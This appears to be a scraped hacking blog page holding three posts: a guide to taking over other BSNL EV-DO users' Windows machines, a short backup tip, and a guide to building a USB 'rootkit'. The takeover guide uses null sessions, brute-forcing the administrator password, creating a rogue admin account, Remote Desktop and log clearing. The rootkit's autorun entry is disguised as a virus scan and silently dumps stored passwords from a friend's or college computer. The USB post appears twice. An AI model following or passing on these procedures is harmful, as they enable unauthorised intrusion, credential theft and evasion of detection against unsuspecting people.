BSNL is a Government body now been privatised that offers Telecommunication and Broadband services in India. It also offers USB Modem for both rental and for owning. This hack works on almost all the USB Modems ( ZTE EV-DO ) provided by BSNL. EVDO is a Technology short for " Evolution - Data only " that uses 3G Technology introduced by Qualcomm. Here i am going to share how to eavesdrop into someones Network who are using BSNL EV-DO, and using this trick you can entirely take control of the box.
This hack works only with Windows based Boxes. Step 1 :
Install the Driver required for BSNL ZTE EV-DO Modem, as a part of the installation, it will prompt you to plug-in the device, then change the default username and password, then connect to the internet. Step 2 :
While the modem is connected to the internet, open up a command prompt and type " Net View "
command in it, then it will display all the names of the machines that are connected to the same network that uses the similar device ( EV-DO ). It will blindly display the hostnames that are a part in that network, but it wont show whether the connected machines are alive or not. Here is list of hostnames that was available when i was dealing with this, let it be a POC.
Step 3:
Now the major part is to find a host that is alive, and this can be done both manually and
also by using automated Batch program, once you got the host that is alive, you can connect to
its hidden IPC$ ( Inter Process Connect ) share by using the below command, Net use \\IP- Address\IPC$ "" in my case i used the following.....
So this will establish a NULL session with the target host that i have used, now the target system and my computer is connected, and by using we have to move further...
Step 4:
Now to check whether there is connection between your computer and the target, just type the below command, net use This will reveal the current connections..... Step 5: In every windows based boxes, there must be an Administrator account, few of them will never set a password for default administrator account, and only few will do it. Now we are trying to gain Administrator access to the remote box, and this can be done by using Dictionary attack or by Launching Brute Force attack against the target.
You can compromise admin account by using Dictionary attack, and you can use the "LAN Remote
user - Dictionary Attack" Check with the syntax properly before starting..... Step 6:
Once you obtained the password of the administrator account, you can use the same net command
to establish a connection with administrator rights.... Net use \\IP-Address\sharename "password" /user:administrator once you got the message "Command Completed Successfully" then you are connected to the target
machine with admin access. Step 7:
Now goto run and type "compmgmt.msc", this will take you to the Computer management, Click on
Action -> Connect to another computer.... and then type in the IP address or the Hostname of
the target machine. Once you got access to the remote host, now you can see the computer management(Local) changes
to the Computer Management(XXX.XXX.XXX.XXX) - Remote IP. Step 8:
You can now create a New user account on the remote machine by expanding the Local users and
Groups -> users -> right click there and create a new user and assign Admin rights. Step 9:
Now you can start a Terminal Session to the remote host, or you can just start a Remote desktop connection, goto run and type MSTSC and hit enter. Step 10:
Type in the Ip address of the remote host in the Remote Desktop connection wizard and take over the compter. Step 11:
To cover the traces just clear all the logs in the eventviewer in the target by using the computer management itself, also make sure to delete the IPC$ connection logs by using the command Net use \\IP- Address\IPC$ /delete This is a high Potential Security threat... because anyone can easily gain control over the computer accross the network and can root them, Make them Zombies and later as botnets and so on. Step 12:
To avoid being a victim to such kind of attacks, you can read the aticle by Clicking here . Disclaimer :-
This is only meant for Educational purpose, The author nor the publisher takes No Responsibilty for any illegal activity.
WELCOME GUEST ENJOY YOUR STAY HERE...
TELL A FRIEND ABOUT US..
Showing posts with label hardware. Show all posts
Showing posts with label hardware. Show all posts
Monday, September 14, 2009
Saturday, August 29, 2009
Back Up your Hard Drive Automatically
When was the last time you backed up your important files? Last year when your friend called in tears after the Blue Screen of Death ate his thesis? We thought so. Learn to set up a program called SyncBack which automatically generates password protected zip files of your important documents.
Benefits:
It's free and pretty easy to use.
You can choose to save them to an external hard drive or upload them to an FTP server.
Schedule nightly, weekly, and monthly backups so you don't have to lift a finger.
No, don't just bookmark this post and do it later. Do it now! Before it's too late! If you need assistance automating backup, see a full guide to using SyncBack
Benefits:
It's free and pretty easy to use.
You can choose to save them to an external hard drive or upload them to an FTP server.
Schedule nightly, weekly, and monthly backups so you don't have to lift a finger.
No, don't just bookmark this post and do it later. Do it now! Before it's too late! If you need assistance automating backup, see a full guide to using SyncBack
Thursday, August 27, 2009
Hack Passwords Using USB Drive
Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. We need the following tools to create our rootkit. MessenPass : Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4 .x/2003 , AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. il PassView : Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002 /2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview : IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0 , as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView : Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more... PasswordFox : PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. Here is a step by step procedre to create the password hacking toolkit. NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files - mspass.exe , mailpv.exe , iepv.exe , pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it [autorun]
open=launch.bat
ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy the autorun.inf file onto your USB pendrive. 3. Create another Notepad and write the following text onto it. start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend's PC or on your college computer. Just follow these steps 1 . Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive). 2. In the pop-up window, select the first option ( Perform a Virus Scan ). 3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. 4. Remove the pendrive and you'll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview : IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0 , as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView : Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more... PasswordFox : PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. Here is a step by step procedre to create the password hacking toolkit. NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files - mspass.exe , mailpv.exe , iepv.exe , pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it [autorun]
open=launch.bat
ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy the autorun.inf file onto your USB pendrive. 3. Create another Notepad and write the following text onto it. start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend's PC or on your college computer. Just follow these steps 1 . Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive). 2. In the pop-up window, select the first option ( Perform a Virus Scan ). 3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. 4. Remove the pendrive and you'll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
Subscribe to:
Posts (Atom)
MY STATS
